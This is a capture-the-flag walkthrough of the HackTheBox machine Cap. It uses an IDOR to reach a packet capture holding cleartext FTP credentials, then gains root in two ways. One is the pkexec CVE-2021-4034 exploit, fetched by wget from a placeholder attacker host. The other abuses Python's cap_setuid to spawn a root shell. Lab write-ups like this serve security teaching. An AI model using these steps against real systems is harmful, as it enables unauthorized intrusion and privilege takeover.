Walkthrough - Cap on HackTheBox
Gain a foothold on this machine with cleartext credentials through an IDOR, followed by privilege escalation via files with improperly configured capabilities.
Nmap
As always, let's start with port enumeration:
nmap -v -sV box.htb
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
80/tcp open http gunicorn
Note: box.htb has been configured to point to the machine in /etc/hosts on Kali
We see that the machine has FTP, SSH and a web server running. Both FTP and SSH are running secure versions, so let's turn our attention to the web server:
Web Server
I started by running dirbuster on the web server, but nothing useful turned up.
After accesing the web server, we are greeted with a security dashboard with the following pages and functionaity in the navigation bar:
- Security Snapshot (5 second PCAP + Analysis)
- IP Config
- Network Status
- Search
A brief examination shows that IP Config, Network Status are purely informative, and that the Search function does not work. The Security Snapshot feature is an interesting one, and we might find some interesting traffic in the packet capture.
The Security Snapshot links to a /capture endpoint, and the server redirects us to /data/1. Visiting this page again redirects us to /data/2, indicating that the final parameter can be modified to show a different set of packet capture data.
We strike gold when we navigate to /data/0, because we get access to a packet capture containing FTP credentials in cleartext:
nathan:Buck3tH4TF0RM3!
Let's login to the FTP server to see if there's anything useful:
ftp box.htb
Connected to box.htb.
220 (vsFTPd 3.0.3)
Name (box.htb:kali): nathan
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 3 1001 1001 4096 Aug 23 09:55 snap
-r-------- 1 1001 1001 33 Aug 23 09:35 user.txt
226 Directory send OK.
ftp> get user.txt
And boom, we have the user flag.
cat user.txt
ed7e52**************************
Let's see if we can login to SSH to obtain shell, and turns out we can... That's why you shouldn't reuse passwords across services!
Privilege Escalation
Now let's try and get root access.
Method 1 - PolicyKit Exploit
LinPEAS suggests that the machine is vulnerable to CVE-2021-4034, a local privilege escalation vulnerability in polkit's pkexec, which comes pre-installed on most Linux distributions.
Start by downloading the exploit here.
We can host it on our attacking machine using a simple HTTP server.
python -m SimpleHTTPServer <port>
Serving HTTP on 0.0.0.0 port 1234 ...
Now download the exploit files onto the victim machine, compile and run the exploit!
wget http://<attacker-ip>:<port>/main
unzip main
cd CVE-2021-4034
make
./cve-2021-4034
And we have root!
cat /root/root.txt
99cd63**************************
Carry on reading if you're interested in how we can leverage a misconfigured setuid capability to escalate our privileges:
Method 2 - SetUid Capability
The LinPEAS script enumerates files with special capabilities:
Files with capabilities (limited to 50):
/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip
/usr/bin/ping = cap_net_raw+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
Notice that /usr/bin/python3.8 has the cap_setuid capability set, allowing it to manipulate process user ID's.
Recall that root on linux has the user ID of 0, meaning we can obtain root if we can spawn a shell and change its user ID to 0.
/usr/bin/python3.8
Python 3.8.5 (default, Jan 27 2021, 15:41:15)
[GCC 9.3.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> import os
>>> os.setuid(0)
>>> os.system("/bin/bash")
root@cap:/
And voila!
cat /root/root.txt
99cd63**************************